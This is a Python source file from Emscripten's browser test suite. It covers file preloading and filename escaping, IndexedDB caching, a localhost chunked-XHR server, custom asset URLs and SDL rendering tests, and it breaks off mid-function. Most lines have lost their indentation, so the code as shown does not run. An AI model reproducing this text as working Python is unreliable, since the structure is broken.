# coding=utf-8
# Copyright 2013 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
import argparse
import json
import multiprocessing
import os
import random
import shlex
import shutil
import subprocess
import time
import unittest
import webbrowser
import zlib
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.request import urlopen
from runner import BrowserCore, RunnerCore, path_from_root, has_browser, EMTEST_BROWSER, Reporting
from runner import create_file, parameterized, ensure_dir, disabled, test_file
from tools import building
from tools import shared
from tools import system_libs
from tools.shared import PYTHON, EMCC, WINDOWS, FILE_PACKAGER, PIPE
from tools.shared import try_delete, config
def test_chunked_synchronous_xhr_server(support_byte_ranges, chunkSize, data, checksum, port):
class ChunkedServerHandler(BaseHTTPRequestHandler):
def sendheaders(s, extra=[], length=len(data)):
s.send_response(200)
s.send_header("Content-Length", str(length))
s.send_header("Access-Control-Allow-Origin", "http://localhost:%s" % port)
s.send_header('Cross-Origin-Resource-Policy', 'cross-origin')
s.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')
s.send_header("Access-Control-Expose-Headers", "Content-Length, Accept-Ranges")
s.send_header("Content-type", "application/octet-stream")
if support_byte_ranges:
s.send_header("Accept-Ranges", "bytes")
for i in extra:
s.send_header(i[0], i[1])
s.end_headers()
def do_HEAD(s):
s.sendheaders()
def do_OPTIONS(s):
s.sendheaders([("Access-Control-Allow-Headers", "Range")], 0)
def do_GET(s):
if s.path == '/':
s.sendheaders()
elif not support_byte_ranges:
s.sendheaders()
s.wfile.write(data)
else:
start, end = s.headers.get("range").split("=")[1].split("-")
start = int(start)
end = int(end)
end = min(len(data) - 1, end)
length = end - start + 1
s.sendheaders([], length)
s.wfile.write(data[start:end + 1])
# CORS preflight makes OPTIONS requests which we need to account for.
expectedConns = 22
httpd = HTTPServer(('localhost', 11111), ChunkedServerHandler)
for i in range(expectedConns + 1):
httpd.handle_request()
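# A minimal, hypothetical sketch (not used by the tests) of how a client could
# exercise the byte-range support above, assuming the server is already
# listening on localhost:11111. The helper name and the example range are
# illustrative assumptions, not values taken from this suite.
def example_fetch_range(start, end, port=11111):
  from urllib.request import Request
  req = Request('http://localhost:%d/' % port,
                headers={'Range': 'bytes=%d-%d' % (start, end)})
  with urlopen(req) as response:
    # The handler above replies with Content-Length == end - start + 1 bytes.
    return response.read()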
def shell_with_script(shell_file, output_file, replacement):
with open(path_from_root('src', shell_file)) as input:
with open(output_file, 'w') as output:
output.write(input.read().replace('{{{ SCRIPT }}}', replacement))
def is_chrome():
return EMTEST_BROWSER and 'chrom' in EMTEST_BROWSER.lower()
def no_chrome(note='chrome is not supported'):
if is_chrome():
return unittest.skip(note)
return lambda f: f
def is_firefox():
return EMTEST_BROWSER and 'firefox' in EMTEST_BROWSER.lower()
def no_firefox(note='firefox is not supported'):
if is_firefox():
return unittest.skip(note)
return lambda f: f
def no_swiftshader(f):
assert callable(f)
def decorated(self):
if is_chrome() and '--use-gl=swiftshader' in EMTEST_BROWSER:
self.skipTest('not compatible with swiftshader')
return f(self)
return decorated
def requires_threads(f):
assert callable(f)
def decorated(self, *args, **kwargs):
if os.environ.get('EMTEST_LACKS_THREAD_SUPPORT'):
self.skipTest('EMTEST_LACKS_THREAD_SUPPORT is set')
return f(self, *args, **kwargs)
return decorated
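# For illustration only: the same environment-gated skip pattern used by
# requires_threads could gate other capabilities. The EMTEST_LACKS_WEBGL2
# variable and the requires_webgl2 name below are hypothetical, not part of
# this suite.
def requires_webgl2(f):
  assert callable(f)
  def decorated(self, *args, **kwargs):
    if os.environ.get('EMTEST_LACKS_WEBGL2'):
      self.skipTest('EMTEST_LACKS_WEBGL2 is set')
    return f(self, *args, **kwargs)
  return decorated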
def requires_asmfs(f):
assert callable(f)
def decorated(self, *args, **kwargs):
# https://github.com/emscripten-core/emscripten/issues/9534
self.skipTest('ASMFS is looking for a maintainer')
return f(self, *args, **kwargs)
return decorated
# Today we only support the wasm backend, so any test that was disabled under the llvm
# backend is now always disabled.
# TODO(sbc): Investigate all tests with this decorator and either fix or remove the test.
def no_wasm_backend(note=''):
assert not callable(note)
return unittest.skip(note)
requires_graphics_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_GRAPHICS_HARDWARE'), "This test requires graphics hardware")
requires_sound_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_SOUND_HARDWARE'), "This test requires sound hardware")
requires_sync_compilation = unittest.skipIf(is_chrome(), "This test requires synchronous compilation, which does not work in Chrome (except for tiny wasms)")
requires_offscreen_canvas = unittest.skipIf(os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'), "This test requires a browser with OffscreenCanvas")
class browser(BrowserCore):
@classmethod
def setUpClass(cls):
super(browser, cls).setUpClass()
cls.browser_timeout = 60
print()
print('Running the browser tests. Make sure the browser allows popups from localhost.')
print()
def setUp(self):
super(browser, self).setUp()
# avoid various compiler warnings that many browser tests currently generate
self.emcc_args += [
'-Wno-pointer-sign',
'-Wno-int-conversion',
]
def test_sdl1_in_emscripten_nonstrict_mode(self):
if 'EMCC_STRICT' in os.environ and int(os.environ['EMCC_STRICT']):
self.skipTest('This test requires being run in non-strict mode (EMCC_STRICT env. variable unset)')
# TODO: This test is verifying behavior that will be deprecated at some point in the future; remove this test once
# system JS libraries are no longer automatically linked.
self.btest('hello_world_sdl.cpp', reference='htmltest.png')
def test_sdl1(self):
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-lSDL', '-lGL'])
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-s', 'USE_SDL', '-lGL']) # is the default anyhow
# Deliberately named as test_zzz_* to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_html_source_map(self):
if not has_browser():
self.skipTest('need a browser')
cpp_file = 'src.cpp'
html_file = 'src.html'
# browsers will try to 'guess' the corresponding original line if a
# generated line is unmapped, so if we want to make sure that our
# numbering is correct, we need to provide a couple of 'possible wrong
# answers'. thus, we add some printf calls so that the cpp file gets
# multiple mapped lines. in other words, if the program consists of a
# single 'throw' statement, browsers may just map any thrown exception to
# that line, because it will be the only mapped line.
with open(cpp_file, 'w') as f:
f.write(r'''
#include <cstdio>
int main() {
printf("Starting test\n");
try {
throw 42; // line 8
} catch (int e) { }
printf("done\n");
return 0;
}
''')
# use relative paths when calling emcc, because file:// URIs can only load
# sourceContent when the maps are relative paths
try_delete(html_file)
try_delete(html_file + '.map')
self.compile_btest(['src.cpp', '-o', 'src.html', '-g4'])
self.assertExists(html_file)
self.assertExists('src.wasm.map')
webbrowser.open_new('file://' + html_file)
print('''
If manually bisecting:
Check that you see src.cpp among the page sources.
Even better, add a breakpoint, e.g. on the printf, then reload, then step
through and see the print (best to run with EMTEST_SAVE_DIR=1 for the reload).
''')
def test_emscripten_log(self):
self.btest_exit(test_file('emscripten_log', 'emscripten_log.cpp'),
args=['--pre-js', path_from_root('src', 'emscripten-source-map.min.js'), '-g4'])
def test_preload_file(self):
absolute_src_path = os.path.join(self.get_dir(), 'somefile.txt').replace('\\', '/')
open(absolute_src_path, 'w').write('''load me right before running the code please''')
absolute_src_path2 = os.path.join(self.get_dir(), '.somefile.txt').replace('\\', '/')
open(absolute_src_path2, 'w').write('''load me right before running the code please''')
absolute_src_path3 = os.path.join(self.get_dir(), 'some@file.txt').replace('\\', '/')
open(absolute_src_path3, 'w').write('''load me right before running the code please''')
def make_main(path):
print('make main at', path)
path = path.replace('\\', '\\\\').replace('"', '\\"') # Escape tricky path name for use inside a C string.
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
REPORT_RESULT(result);
return 0;
}
''' % path)
test_cases = [
# (source preload-file string, file on target FS to load)
("somefile.txt", "somefile.txt"),
(".somefile.txt@somefile.txt", "somefile.txt"),
("./somefile.txt", "somefile.txt"),
("somefile.txt@file.txt", "file.txt"),
("./somefile.txt@file.txt", "file.txt"),
("./somefile.txt@./file.txt", "file.txt"),
("somefile.txt@/file.txt", "file.txt"),
("somefile.txt@/", "somefile.txt"),
(absolute_src_path + "@file.txt", "file.txt"),
(absolute_src_path + "@/file.txt", "file.txt"),
(absolute_src_path + "@/", "somefile.txt"),
("somefile.txt@/directory/file.txt", "/directory/file.txt"),
("somefile.txt@/directory/file.txt", "directory/file.txt"),
(absolute_src_path + "@/directory/file.txt", "directory/file.txt"),
("some@@file.txt@other.txt", "other.txt"),
("some@@file.txt@some@@otherfile.txt", "some@otherfile.txt")]
for srcpath, dstpath in test_cases:
print('Testing', srcpath, dstpath)
make_main(dstpath)
self.compile_btest(['main.cpp', '--preload-file', srcpath, '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
if WINDOWS:
# On Windows, the following non-alphanumeric non-control code ASCII characters are supported.
# The characters <, >, ", |, ?, * are not allowed, because the Windows filesystem doesn't support those.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~.txt'
else:
# All 7-bit non-alphanumeric non-control code ASCII characters except /, : and \ are allowed.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~ "*<>?|.txt'
open(os.path.join(self.get_dir(), tricky_filename), 'w').write('''load me right before running the code please''')
make_main(tricky_filename)
# As an Emscripten-specific feature, the character '@' must be escaped as '@@' so it is not confused with the 'src@dst' notation (see the escaping sketch just below).
self.compile_btest(['main.cpp', '--preload-file', tricky_filename.replace('@', '@@'), '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
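# Sketch of the '@@' escaping rule above (hypothetical helper, not an
# emcc/file_packager API): a literal '@' in a source filename is doubled so it
# is not parsed as the src@dst separator.
#
#   def escape_at(path):
#     return path.replace('@', '@@')
#
#   escape_at('some@file.txt')  # -> 'some@@file.txt', preloaded as 'some@file.txt'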
# By absolute path
make_main('somefile.txt') # absolute becomes relative
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test subdirectory handling with asset packaging.
try_delete('assets')
ensure_dir('assets/sub/asset1/'.replace('\\', '/'))
ensure_dir('assets/sub/asset1/.git'.replace('\\', '/')) # Test adding directory that shouldn't exist.
ensure_dir('assets/sub/asset2/'.replace('\\', '/'))
create_file('assets/sub/asset1/file1.txt', '''load me right before running the code please''')
create_file('assets/sub/asset1/.git/shouldnt_be_embedded.txt', '''this file should not get embedded''')
create_file('assets/sub/asset2/file2.txt', '''load me right before running the code please''')
absolute_assets_src_path = 'assets'.replace('\\', '/')
def make_main_two_files(path1, path2, nonexistingpath):
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
f = fopen("%s", "r");
if (f == NULL)
result = 0;
fclose(f);
f = fopen("%s", "r");
if (f != NULL)
result = 0;
REPORT_RESULT(result);
return 0;
}
''' % (path1, path2, nonexistingpath))
test_cases = [
# (source directory to embed, file1 on target FS to load, file2 on target FS to load, name of a file that *shouldn't* exist on VFS)
("assets", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@./", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/assets", "/assets/sub/asset1/file1.txt", "/assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt")]
for test in test_cases:
(srcpath, dstpath1, dstpath2, nonexistingpath) = test
make_main_two_files(dstpath1, dstpath2, nonexistingpath)
print(srcpath)
self.compile_btest(['main.cpp', '--preload-file', srcpath, '--exclude-file', '*/.*', '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Should still work with -o subdir/..
make_main('somefile.txt') # absolute becomes relative
ensure_dir('dirrey')
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'dirrey/page.html'])
self.run_browser('dirrey/page.html', 'You should see |load me right before|.', '/report_result?1')
# With FS.preloadFile
create_file('pre.js', '''
Module.preRun = function() {
FS.createPreloadedFile('/', 'someotherfile.txt', 'somefile.txt', true, false); // we need --use-preload-plugins for this.
};
''')
make_main('someotherfile.txt')
self.compile_btest(['main.cpp', '--pre-js', 'pre.js', '-o', 'page.html', '--use-preload-plugins'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Tests that user .html shell files can manually download .data files created with --preload-file cmdline.
def test_preload_file_with_manual_data_download(self):
src = test_file('manual_download_data.cpp')
create_file('file.txt', '''Hello!''')
self.compile_btest([src, '-o', 'manual_download_data.js', '--preload-file', 'file.txt@/file.txt'])
shutil.copyfile(test_file('manual_download_data.html'), 'manual_download_data.html')
self.run_browser('manual_download_data.html', 'Hello!', '/report_result?1')
# Tests that output files with single or double quotes in their names are handled by correctly escaping the names.
def test_output_file_escaping(self):
tricky_part = '\'' if WINDOWS else '\' and \"' # On Windows, files/directories may not contain a double quote character; on other platforms they can, so test that.
d = 'dir with ' + tricky_part
abs_d = os.path.join(self.get_dir(), d)
ensure_dir(abs_d)
txt = 'file with ' + tricky_part + '.txt'
abs_txt = os.path.join(abs_d, txt)
open(abs_txt, 'w').write('load me right before')
cpp = os.path.join(d, 'file with ' + tricky_part + '.cpp')
open(cpp, 'w').write(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("|load me right before|", buf);
REPORT_RESULT(result);
return 0;
}
''' % (txt.replace('\'', '\\\'').replace('\"', '\\"')))
data_file = os.path.join(abs_d, 'file with ' + tricky_part + '.data')
data_js_file = os.path.join(abs_d, 'file with ' + tricky_part + '.js')
self.run_process([FILE_PACKAGER, data_file, '--use-preload-cache', '--indexedDB-name=testdb', '--preload', abs_txt + '@' + txt, '--js-output=' + data_js_file])
page_file = os.path.join(d, 'file with ' + tricky_part + '.html')
abs_page_file = os.path.join(self.get_dir(), page_file)
self.compile_btest([cpp, '--pre-js', data_js_file, '-o', abs_page_file, '-s', 'FORCE_FILESYSTEM'])
self.run_browser(page_file, '|load me right before|.', '/report_result?0')
def test_preload_caching(self):
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % 'somefile.txt')
create_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
# test caching of various sizes, including sizes higher than 128MB which is
# chrome's limit on IndexedDB item sizes, see
# https://cs.chromium.org/chromium/src/content/renderer/indexed_db/webidbdatabase_impl.cc?type=cs&q=%22The+serialized+value+is+too+large%22&sq=package:chromium&g=0&l=177
# https://cs.chromium.org/chromium/src/out/Debug/gen/third_party/blink/public/mojom/indexeddb/indexeddb.mojom.h?type=cs&sq=package:chromium&g=0&l=60
for extra_size in (0, 1 * 1024 * 1024, 100 * 1024 * 1024, 150 * 1024 * 1024):
if is_chrome() and extra_size >= 100 * 1024 * 1024:
continue
create_file('somefile.txt', '''load me right before running the code please''' + ('_' * extra_size))
print('size:', os.path.getsize('somefile.txt'))
self.compile_btest(['main.cpp', '--use-preload-cache', '--js-library', 'test.js', '--preload-file', 'somefile.txt', '-o', 'page.html', '-s', 'ALLOW_MEMORY_GROWTH'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_preload_caching_indexeddb_name(self):
create_file('somefile.txt', '''load me right before running the code please''')
def make_main(path):
print(path)
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % path)
create_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
make_main('somefile.txt')
self.run_process([FILE_PACKAGER, 'somefile.data', '--use-preload-cache', '--indexedDB-name=testdb', '--preload', 'somefile.txt', '--js-output=' + 'somefile.js'])
self.compile_btest(['main.cpp', '--js-library', 'test.js', '--pre-js', 'somefile.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_multifile(self):
# a few files inside a directory
ensure_dir(os.path.join('subdirr', 'moar'))
create_file(os.path.join('subdirr', 'data1.txt'), '1214141516171819')
create_file(os.path.join('subdirr', 'moar', 'data2.txt'), '3.14159265358979')
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
FILE *f2 = fopen("subdirr/moar/data2.txt", "r");
fread(buf, 1, 16, f2);
buf[16] = 0;
fclose(f2);
printf("|%s|\n", buf);
result = result && !strcmp("3.14159265358979", buf);
REPORT_RESULT(result);
return 0;
}
''')
# by individual files
self.compile_btest(['main.cpp', '--preload-file', 'subdirr/data1.txt', '--preload-file', 'subdirr/moar/data2.txt', '-o', 'page.html'])
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
os.remove('page.html')
# by directory, and remove files to make sure
self.compile_btest(['main.cpp', '--preload-file', 'subdirr', '-o', 'page.html'])
shutil.rmtree('subdirr')
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
def test_custom_file_package_url(self):
# a few files inside a directory
ensure_dir('subdirr')
ensure_dir('cdn')
create_file(os.path.join('subdirr', 'data1.txt'), '1214141516171819')
# change the file package base dir to look in a "cdn". note that normally
# you would add this in your own custom html file etc., and not by
# modifying the existing shell in this manner
create_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
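# For readability: the locateFile hook injected above is equivalent to the
# following (JavaScript, reformatted; same logic as the one-liner):
#
#   var Module = {
#     locateFile: function(path, prefix) {
#       // .wasm files stay next to the generated JS; everything else
#       // (e.g. the .data package) is fetched from the "cdn" directory.
#       if (path.endsWith('.wasm')) return prefix + path;
#       return 'cdn/' + path;
#     },
#     // ... rest of Module unchanged
#   };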
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
REPORT_RESULT(result);
return 0;
}
''')
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '--preload-file', 'subdirr/data1.txt', '-o', 'test.html'])
shutil.move('test.data', os.path.join('cdn', 'test.data'))
self.run_browser('test.html', '', '/report_result?1')
def test_missing_data_throws_error(self):
def setup(assetLocalization):
self.clear()
create_file('data.txt', 'data')
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
// This code should never be executed, because the required dependency file is missing.
REPORT_RESULT(0);
return 0;
}
''')
create_file('on_window_error_shell.html', r'''
<html>
<center><canvas id='canvas' width='256' height='256'></canvas></center>
<hr><div id='output'></div><hr>
<script type='text/javascript'>
window.onerror = function(error) {
window.onerror = null;
var result = error.indexOf("test.data") >= 0 ? 1 : 0;
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + result, true);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}
var Module = {
locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "''' + assetLocalization + r'''" + path;}},
print: (function() {
var element = document.getElementById('output');
return function(text) { element.innerHTML += text.replace('\n', '<br>', 'g') + '<br>';};
})(),
canvas: document.getElementById('canvas')
};
</script>
{{{ SCRIPT }}}
</body>
</html>''')
def test():
# test that a missing file triggers xhr.onload with a status other than 200, 304 or 206
setup("")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
shutil.move('test.data', 'missing.data')
self.run_browser('test.html', '', '/report_result?1')
# test that an unknown protocol goes through xhr.onerror
setup("unknown_protocol://")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
# test wrong protocol and port
setup("https://localhost:8800/")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
test()
# TODO: CORS, test using a full url for locateFile
# create_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path) {return "http:/localhost:8888/cdn/" + path;}, '))
# test()
def test_dev_random(self):
self.btest(os.path.join('filesystem', 'dev_random.cpp'), expected='0')
def test_sdl_swsurface(self):
self.btest('sdl_swsurface.c', args=['-lSDL', '-lGL'], expected='1')
def test_sdl_surface_lock_opts(self):
# Test Emscripten-specific extensions to optimize SDL_LockSurface and SDL_UnlockSurface.
self.btest('hello_world_sdl.cpp', reference='htmltest.png', message='You should see "hello, world!" and a colored cube.', args=['-DTEST_SDL_LOCK_OPTS', '-lSDL', '-lGL'])
def test_sdl_image(self):
# load an image file, get pixel data. Also -O2 coverage for --preload-file and memory-init
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
src = test_file('sdl_image.c')
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
src, '-o', 'page.html', '-O2', '-lSDL', '-lGL', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_jpeg(self):
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpeg')
src = test_file('sdl_image.c')
self.compile_btest([
src, '-o', 'page.html', '-lSDL', '-lGL',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], also_proxied=True, manually_trigger_reftest=True)
def test_sdl_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], manually_trigger_reftest=True)
def test_sdl_image_must_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl_image_must_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.jpg', '-lSDL', '-lGL'], manually_trigger_reftest=True)
def test_sdl_stb_image(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_bpp(self):
# load grayscale image without alpha
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp1.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp1.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load grayscale image with alpha
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp2.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp2.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGB image
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp3.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp3.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGBA image
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp4.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp4.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_data(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_data.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_cleanup(self):
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_cleanup.c', expected='0', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL', '--memoryprofiler'])
def test_sdl_canvas(self):
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-lSDL', '-lGL'])
# some extra coverage
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-O0', '-s', 'SAFE_HEAP', '-lSDL', '-lGL'])
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-O2', '-s', 'SAFE_HEAP', '-lSDL', '-lGL'])
def post_manual_reftest(self, reference=None):
self.reftest(test_file(self.reference if reference is None else reference))
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
create_file('test.html', html)
def test_sdl_canvas_proxy(self):
create_file('data.txt', 'datum')
self.btest('sdl_canvas_proxy.c', reference='sdl_canvas_proxy.png', args=['--proxy-to-worker', '--preload-file', 'data.txt', '-lSDL', '-lGL'], manual_reference=True, post_build=self.post_manual_reftest)
@requires_graphics_hardware
def test_glgears_proxy_jstarget(self):
# test .js target with --proxy-to-worker; emits 2 js files, client and worker
self.compile_btest([test_file('hello_world_gles_proxy.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'GL_TESTING', '-lGL', '-lglut'])
shell_with_script('shell_minimal.html', 'test.html', '<script src="test.js"></script>')
self.post_manual_reftest('gears.png')
self.run_browser('test.html', None, '/report_result?0')
def test_sdl_canvas_alpha(self):
# N.B. On Linux with Intel integrated graphics cards, this test needs Firefox 49 or newer.
# See https://github.com/emscripten-core/emscripten/issues/4069.
create_file('flag_0.js', '''
Module['arguments'] = ['-0'];
''')
self.btest('sdl_canvas_alpha.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_alpha.png', reference_slack=12)
self.btest('sdl_canvas_alpha.c', args=['--pre-js', 'flag_0.js', '-lSDL', '-lGL'], reference='sdl_canvas_alpha_flag_0.png', reference_slack=12)
def test_sdl_key(self):
for delay in [0, 1]:
for defines in [
[],
['-DTEST_EMSCRIPTEN_SDL_SETEVENTHANDLER']
]:
for async_ in [
[],
['-DTEST_SLEEP', '-s', 'ASSERTIONS', '-s', 'SAFE_HEAP', '-s', 'ASYNCIFY']
]:
print(delay, defines, async_)
create_file('pre.js', '''
function keydown(c) {
%s
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
